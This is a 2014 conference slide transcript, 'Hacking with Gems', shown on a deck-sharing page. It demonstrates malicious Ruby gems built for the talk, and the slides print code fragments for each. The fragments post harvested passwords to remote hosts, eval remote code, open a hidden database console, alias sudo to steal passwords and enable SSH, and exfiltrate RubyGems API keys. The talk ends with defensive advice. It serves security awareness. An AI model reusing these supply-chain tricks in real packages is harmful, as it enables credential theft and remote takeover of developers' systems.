Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hacking with Gems (denver.rb)

Sponsored · Your Podcast. Everywhere. Effortlessly. Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
Avatar for Benjamin Smith Benjamin Smith
August 13, 2014
Technology
190
0

Hacking with Gems (denver.rb)

Avatar for Benjamin Smith

Benjamin Smith

August 13, 2014

More Decks by Benjamin Smith

See All by Benjamin Smith
Modules instead of Microservies
Avatar for Benjamin Smith benjaminleesmith
0
120
Refactoring Rails Apps with Engines
Avatar for Benjamin Smith benjaminleesmith
4
890
How I architected my big Rails app for success! (ConFoo 2014)
Avatar for Benjamin Smith benjaminleesmith
1
270
Hacking with Gems (ConFoo 2014)
Avatar for Benjamin Smith benjaminleesmith
1
150
How I architected my big Rails app for success! (RubyConfAU 2014)
Avatar for Benjamin Smith benjaminleesmith
2
420
How I architected my big Rails app for success! (RMR 2013)
Avatar for Benjamin Smith benjaminleesmith
4
420
Keeping Your Massive Rails App From Turning Into a S#!t Show (WindyCityRails 2013)
Avatar for Benjamin Smith benjaminleesmith
1
290
Architecting your Rails app for success! (EuRuKo 2013)
Avatar for Benjamin Smith benjaminleesmith
4
1.3k
Hacking with Gems (RuLu 2013)
Avatar for Benjamin Smith benjaminleesmith
3
1.6k

Other Decks in Technology

See All in Technology
「コーディング」しない人のための Claude Code 入門 ChatGPT の次の一歩 — 業務に組み込む 育成・共有・自動化
Avatar for ふくだ(fukuda ryu) rfdnxbro
2
1.2k
LLMを「主役」にしないための 3つの原則
Avatar for PERSOL CAREER Dev | techtekt techtekt
PRO
0
120
Building applications in the Gemini API family.
Avatar for LINE Developers Taiwan line_developers_tw
PRO
0
1.9k
Oracle AI Database@Google Cloud:サービス概要のご紹介
Avatar for oracle4engineer oracle4engineer
PRO
6
1.5k
サイバーセキュリティ概論 / Introduction to Cybersecurity
Avatar for Kenji Saito ks91
PRO
0
170
探して_入れて_作って_使う_Agent_Skills___LT.pdf
Avatar for 松尾淳平 peintangos
2
160
Oracle AI Database@Azure:サービス概要のご紹介
Avatar for oracle4engineer oracle4engineer
PRO
6
1.9k
Mastering Ruby Box
Avatar for Satoshi Tagomori tagomoris
3
150
Rubyで音を視る
Avatar for ydah ydah
1
100
AIプラットフォームを運用し続けるための可観測性
Avatar for tanimuyk tanimuyk
4
1.1k
AI-DLCを活用した高品質・安全なAI駆動開発実践 / AI Driven Development
Avatar for 吉田真吾 yoshidashingo
1
380
価格.comをAI駆動で全面刷新する ー 30年分の技術的負債を返し、次の30年の土台をつくる ー / AI Engineering Summit Tokyo 2026
Avatar for tkyowa tkyowa
49
54k

Featured

See All Featured
Helping Users Find Their Own Way: Creating Modern Search Experiences
Avatar for Dan Newman danielanewman
31
3.2k
How to Align SEO within the Product Triangle To Get 
Buy-In & Support - #RIMC
Avatar for Aleyda Solis aleyda
2
1.5k
SEOcharity - Dark patterns in SEO and UX: How to avoid them and build a more ethical web
Avatar for Sara Fernández Carmona sarafernandez
0
200
Leveraging Curiosity to Care for An Aging Population
Avatar for Cassini Nazir cassininazir
1
260
It's Worth the Effort
Avatar for 3n 3n
188
29k
How to Ace a Technical Interview
Avatar for Jacob Kaplan-Moss jacobian
281
24k
Embracing the Ebb and Flow
Avatar for Simon Collison colly
88
5.1k
Building a Modern Day 
E-commerce SEO Strategy
Avatar for Aleyda Solis aleyda
45
9.1k
Designing for humans not robots
Avatar for Tammie Lister tammielis
254
26k
Building the Perfect Custom Keyboard
Avatar for Naoto Takai takai
2
780
Sam Torres - BigQuery for SEOs
Avatar for Tech SEO Connect techseoconnect
PRO
0
280
Have SEOs Ruined the Internet? - User Awareness of SEO in 2025
Avatar for Akash Hashmi akashhashmi
0
360

Transcript

  1. Hacking with Gems Benjamin Smith @benjamin_smith

  2. How to punk your friends with gems Benjamin Smith @benjamin_smith

  3. How-to get rich quick and (maybe) not go to jail!

    Benjamin Smith @benjamin_smith

  4. Four reasons you should NOT trust Benjamin Smith @benjamin_smith

  5. None

  6. who i am

  7. who i am

  8. who i am

  9. what i am NOT

  10. None

  11. please do not try this at home

  12. please do not try this at home

  13. None
  14. None

  15. Lawful Evil Lawful Good

  16. Lawful Evil Lawful Good

  17. Lawful Evil Lawful Good

  18. Lawful Evil Lawful Good

  19. once upon a time

  20. GEM remote: https://rubygems.org/ specs: actionmailer (4.1.4) actionpack (= 4.1.4) actionview

    (= 4.1.4) mail (~> 2.5.4) actionpack (4.1.4) actionview (= 4.1.4) activesupport (= 4.1.4) rack (~> 1.5.2)

  21. what’s the worst that could happen?

  22. None

  23. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  24. before... github.com/benjaminleesmith/awesome-rails-flash-messages

  25. after! github.com/benjaminleesmith/awesome-rails-flash-messages

  26. some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  27. ... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

  28. ?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

  29. i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  30. i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages

  31. “development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages

  32. elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

  33. profit • Step 1: do something • Step 2: do

    something else • Step 3: ???? • Step 4: profit

  34. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4:

  35. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: • Step 4:

  36. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:

  37. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit

  38. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country

  39. a one way ticket to

  40. that was easy. what else can I do?

  41. gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

  42. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector

  43. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  44. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  45. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  46. ...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

  47. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  48. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  49. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  50. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  51. /users/sign_in github.com/benjaminleesmith/net_http_detector

  52. /users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

  53. hello db access! github.com/benjaminleesmith/net_http_detector

  54. SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

  55. UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

  56. CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

  57. careful of wolves in sheep’s clothing

  58. profit • Step 1: • Step 2: • Step 3:

    • Step 4: • Step 5:

  59. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: • Step 5:

  60. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:

  61. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:

  62. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:

  63. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country

  64. i like the beach

  65. that was easy. what else can I do?

  66. gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

  67. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
  68. None

  69. what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s

  70. better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0

    8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s

  71. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s

  72. what what github.com/benjaminleesmith/better_date_to_s

  73. i can haz source github.com/benjaminleesmith/better_date_to_s

  74. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s

  75. so much code so little time • Step 1: write

    a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country

  76. that was easy hard. what else can I do? (that's

    easier)

  77. gem install bunlder

  78. gem install be_truthy github.com/benjaminleesmith/be_truthy

  79. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy

  80. what it ACTUALLY does github.com/benjaminleesmith/be_truthy

  81. github.com/benjaminleesmith/be_truthy

  82. file tree looks ok github.com/benjaminleesmith/be_truthy

  83. source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

  84. but what was this? github.com/benjaminleesmith/be_truthy

  85. I see no C github.com/benjaminleesmith/be_truthy

  86. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy

  87. there is no Rakefile github.com/benjaminleesmith/be_truthy

  88. the real file tree github.com/benjaminleesmith/be_truthy

  89. the real file tree github.com/benjaminleesmith/be_truthy

  90. what does the Rakefile do? github.com/benjaminleesmith/be_truthy

  91. sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

  92. File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy

  93. FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy

  94. what does "sudo" do now? github.com/benjaminleesmith/be_truthy

  95. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  96. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  97. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  98. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  99. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy

  100. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

    -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy

  101. Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy

  102. ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

  103. take away: don't install ben's gems

  104. None

  105. how could I get you to install my gems?

  106. what gems are trustworthy?

  107. how can I add my code to already trusted gems?

  108. back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip

    ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy

  109. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  110. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  111. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  112. now I own your gems github.com/benjaminleesmith/be_truthy

  113. > git clone your-gem-repo ...add a little code... > rake

    build > gem push your-gem github.com/benjaminleesmith/be_truthy

  114. do people trust your gems?

  115. do people who install your gems have trustworthy gems?

  116. None

  117. there’s still one problem

  118. bootstrapping

  119. being popular sucks

  120. conferences

  121. social engineering

  122. None
  123. None
  124. None

  125. so what happens now?

  126. ruby gems goes down

  127. heroku deploys go down

  128. i go to the beach

  129. ruby gems goes down

  130. heroku deploys go down

  131. recovery

  132. so what now?

  133. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  134. Little Snitch obdev.at/products/littlesnitch/index.html

  135. gem install be_truthy github.com/benjaminleesmith/be_truthy

  136. fseventer fernlightning.com/doku.php?id=software:fseventer:start

  137. don’t “gem install” from strangers

  138. gem fetch vs gem install > gem fetch be_truthy >

    gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
  139. None
  140. None

  141. curl -sSL https://get.rvm.io | bash

  142. gem install rails -P HighSecurity

  143. > gem install rails -P HighSecurity Fetching: i18n-0.6.11.gem (100%) ERROR:

    While executing gem ... (Gem::Security::Exception) unsigned gems are not allowed by the High Security policy

  144. gem cert --build

  145. https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-1.html http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-2.html

  146. sandboxing

  147. github.com/rubygems/rubygems

  148. tools to detect malicious code

  149. private gem repos

  150. do not try this at home

  151. don't install gems you don't need to

  152. pay attention to what your gems do

  153. monitor your system

  154. read the source

  155. gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

  156. on install github.com/benjaminleesmith/coal-mine-canary

  157. the results github.com/benjaminleesmith/coal-mine-canary

  158. thank you!

  159. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

  160. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

  161. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith